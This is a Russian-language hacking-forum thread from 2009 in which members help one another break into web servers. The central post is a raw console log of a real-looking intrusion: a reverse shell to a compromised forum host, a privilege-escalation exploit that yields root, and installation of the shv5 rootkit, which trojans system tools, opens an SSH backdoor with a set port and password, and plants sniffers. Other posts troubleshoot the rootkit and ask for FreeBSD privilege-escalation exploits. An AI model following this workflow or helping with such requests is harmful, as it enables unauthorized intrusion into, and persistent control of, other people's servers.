ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.09.2009, 12:32
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
шелл в личку с возможностью открыть бекконект и я попробую порутать.
|
|
|
01.10.2009, 16:29
|
|
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме:
611883
Репутация:
70
|
|
Вобщем при получении руткита вот что выползает
Код:
C:\nc1>nc dhfcfghity.net 32767
bash: no job control in this shell
dbvncbnity@www:/home/dnfhshrfdgcity/data/www/dnepfdgрrcity.net/forum/customprofilepics$ cd
linux-sendpage3
dnedgdsdfgcity@www:/home/dneprasdcsfadity/data/www/dasdfneprcitdfsfsay.net/forum/customprofilepics/linux-sendpage3$ ./start
sh: no job control in this shell
sh-3.2# tar -xvf /home/dnefdghdfprcity/data/www/dnfedsfpgdfrcity.net/forum/customprofilepics/
shV5.tgz
shv5/
shv5/setup
shv5/README
shv5/lib.tgz
shv5/conf.tgz
shv5/bin.tgz
shv5/utilz.tgz
sh-3.2# cd shv/
sh: cd: shv/: No such file or directory
sh-3.2# cd shv5/
sh-3.2# ./setup 1074963 4321
←[0;36m[←[1;37msh←[0;36m]# Installing shv5 ... this wont take long ←[0m
←[0;36m[←[1;37msh←[0;36m]# If u think we will patch your holes shoot yourself !←
[0m
←[0;36m[←[1;37msh←[0;36m]# so patch manualy and fuck off! ←[0m
←[1;37m=========================================================================
===←[0m
←[0;36m MMMMM MMMMMM
MMM MMMMMMMMM MMMM MMMM MMM[*] Presenting u shv5-rootkit !
MMM MMMM MMMM MMMM MMMM MMM[*] Designed for internal use !
MMM MMMMMMM MMMMMMMMMMMM MMM
MMM MMMMMMMM MMMMMMMMMMMM MMM[*] brought to you by: PinT[x]
MMM MMMM MMMM MMMM MMM[*] April й 2003 й
MMM MMMM MMMM MMMM MMMM MMM
MMM MMMMMMMMM MMMM MMMM MMM[*] *** VERY PRIVATE ***
MMM MMM[*] *** so dont distribute ***
MMMMM -C- -R- -E- -W- MMMMMM
←[0m
←[1;37m=========================================================================
===←[0m
←[0;36m[←[1;37msh←[0;36m]# backdooring started on ←[1;37mwww.uzyuuya.ua←[0m
←[0;36m[←[1;37msh←[0;36m]#
←[0m
←[0;36m[←[1;37msh←[0;36m]#
←[0m
←[0;36m[←[1;37msh←[0;36m]# checking for remote logging... ←[0mgrep: /etc/syslog.
conf: No such file or directory
←[1;37m guess not.←[0m
←[0;36m[←[1;37msh←[0;36m]# checking for tripwire... ←[0m←[1;37m guess not. ←[0m
←[0;36m[←[1;37msh←[0;36m]# [Installing trojans....]
←[1;34m ←[0m
mv: cannot stat `lib/libproc.so.2.0.6': No such file or directory
←[0;36m[←[1;37msh←[0;36m]# Using Password : ←[1;37m12193
←[1;34m ←[0m
←[0;36m[←[1;37msh←[0;36m]# Using ssh-port : ←[1;37m4321
←[0m
mkdir: cannot create directory `/usr/lib/libsh': File exists
mkdir: cannot create directory `/usr/lib/libsh/.backup': File exists
mv: cannot stat `top': No such file or directory
←[0;36m[←[1;37msh←[0;36m]# : ps/ls/top/netstat/ifconfig/find/ and rest
backdoored←[0m
←[0;36m[←[1;37msh←[0;36m]#
←[0m
←[0;36m[←[1;37msh←[0;36m]# [Installing some utils...]
←[0m
←[0;36m[←[1;37msh←[0;36m]# : mirk/synscan/others... moved
←[0m
←[0;36m[←[1;37msh←[0;36m]# [Moving our files...]
←[0m
mkdir: cannot create directory `/usr/lib/libsh/.sniff': File exists
mv: cannot stat `/home/fgdfhnfeghprcity/data/www/dngepfgrdcfity.net/forum/customprofilepics/
linux-sendpage3/shv5/bin/shsniff': No such file or directory
mv: cannot stat `/home/dneghpjhrcjhity/data/www/dnhrfcfiftfy.net/forum/customprofilepics/
linux-sendpage3/shv5/bin/shp': No such file or directory
mv: cannot stat `/home/dnfgrjckihtgy/data/www/dnehjphrjcjigtfy.net/forum/customprofilepics/
linux-sendpage3/shv5/bin/shsb': No such file or directory
chmod: cannot access `/usr/lib/libsh/.sniff/*': No such file or directory
chmod: cannot access `/usr/lib/libsh/shsb': No such file or directory
←[0;36m[←[1;37msh←[0;36m]# : sniff/parse/sauber/hide moved
←[0m
←[0;36m[←[1;37msh←[0;36m]# [Modifying system settings to suite our needs]
←[0m
←[0;36m[←[1;37msh←[0;36m]# Checking for vuln-daemons ... ←[0m
ps: error while loading shared libraries: libproc.so.2.0.6: cannot open shared o
bject file: No such file or directory
mkdir: cannot create directory `/usr/lib/libsh/.owned': File exists
touch: failed to get attributes of `/etc/inted.conf': No such file or directory
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# [System Information...]←[0m
←[0;36m[←[1;37msh←[0;36m]# Hostname :←[1;37m www.bghvba.ua (91.200.42.14)←[0m
←[0;36m[←[1;37msh←[0;36m]# Arch : ←[1;37m2009 -+- bogomips : 5576.18
5571.93 '←[0m
←[0;36m[←[1;37msh←[0;36m]# Alternative IP :←[1;37m 91.200.42.14 -+- Might be [3
] active adapters.←[0m
←[0;36m[←[1;37msh←[0;36m]# Distribution:←[1;37m squeeze/sid←[0m
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# ipchains ... ? ←[0m
←[0;36m[←[1;37msh←[0;36m]# lucky for u no ipchains found←[0m
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# iptables ...?←[0m
iptables: No chain/target/match by that name.
←[1;37m←[0m
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# Just ignore all errors if any !
←[0;36m[←[1;37msh←[0;36m]# ============================== ←[1;31mBackdooring com
pleted in :3 seconds ←[0m
./setup: line 813: /sbin/syslogd: No such file or directory
sh-3.2#
p.s. Адреса в целях безопасности поменял в тексте. Вобщем вопрос, почему ошибка? |
|
|
|
01.10.2009, 16:50
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
он у тя по каким то причинам неможет создать свои файлы, а у тя точно права есть?
|
|
|
|
01.10.2009, 17:14
|
|
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме:
611883
Репутация:
70
|
|
Да, запускал эксплойт который советовал BlackSun предварительно скомпилировав его, затем командой id мне показало что я root и мой id везде 0
|
|
|
|
02.10.2009, 00:29
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
оооч старенький руткит, мб в этом дело?))
|
|
|
|
11.10.2009, 13:39
|
|
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме:
611883
Репутация:
70
|
|
Какой сплоит посоветуете для повышения привелегий на FreeBSD 6.3-STABLE
|
|
|
|
13.10.2009, 01:37
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
На милворме ищи.
|
|
|
|
14.10.2009, 15:07
|
|
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме:
611883
Репутация:
70
|
|
Сколько смотрел абсолютно все выбивают ошибки. Вероятно там специально они сделаны, но в их исправлении я не силен, можно так сказать вообще 0.
|
|
|
|
15.10.2009, 14:32
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 177
Провел на форуме:
551782
Репутация:
58
|
|
Покажи какие ты нашел, я под фри вообще ни одного повышения прав 6.4 не увидел.
|
|
|
|
15.10.2009, 15:24
|
|
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме:
611883
Репутация:
70
|
|
Ой пардон тупанул. Повышение прав есть, а на версию не глянул что-то =/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
